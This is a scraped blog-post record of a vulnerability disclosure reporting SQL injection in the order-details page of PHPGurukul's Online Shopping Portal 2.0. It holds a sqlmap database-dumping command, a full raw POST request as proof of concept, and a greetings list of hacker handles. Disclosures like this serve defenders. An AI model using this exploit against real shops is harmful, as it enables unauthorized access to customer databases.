http:\/\/127.0.0.1\/shopping\/order-details.php [email parameter]http:\/\/127.0.0.1\/shopping\/order-details.php [orderid parameter]\n[O] Proof of concept<\/p>\n
create an account and order one of the items, then track your order.<\/p>\n
sqlmap.py “YOU RAW DATA” –dbs<\/p>\n[SQL]POST \/shopping\/order-details.php HTTP\/1.1
Host: 127.0.0.1
Content-Length: 42
Cache-Control: max-age=0
sec-ch-ua: “Not\/A)Brand”;v=”8″, “Chromium”;v=”126″
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: “Windows”
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http:\/\/127.0.0.1
Content-Type: application\/x-www-form-urlencoded
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/126.0.6478.127 Safari\/537.36
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http:\/\/127.0.0.1\/shopping\/track-orders.php
Accept-Encoding: gzip, deflate, br
Cookie: auth-token-secret=ce668e880e958286436c06776b331b4b; auth-token=cc6dae05ce833672d48f461769dcd56c; PHPSESSID=qnae9mjoqfs22v54k55e1bt1hh
Connection: keep-alive<\/p>\n
orderid=1&email=vrs_hck@maho.id&submit=<\/p>\n[x]========================================================================================================================================[x]\n[O] Greetz<\/p>\n
BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<\/p>\n[x]========================================================================================================================================[x]\n","protected":false},"excerpt":{"rendered":"
[x]========================================================================================================================================[x]| Title : Online Shopping Portal Project 2.0 SQL Vulnerabilities| Software : Online Shopping Portal Project| Create By : https:\/\/phpgurukul.com\/author\/anujk305\/| Version : V 2.0| Last Updated : 06 June 2024| Download : https:\/\/phpgurukul.com\/shopping-portal-free-download\/| Date : 03 Agustus 2024| Author : OoN_Boy[x]========================================================================================================================================[x]| Technology : PHP| Database : MySQL| Price : FREE| Description : E-commerce means any …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58639","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58639","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58639"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58639\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58639"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58639"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58639"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}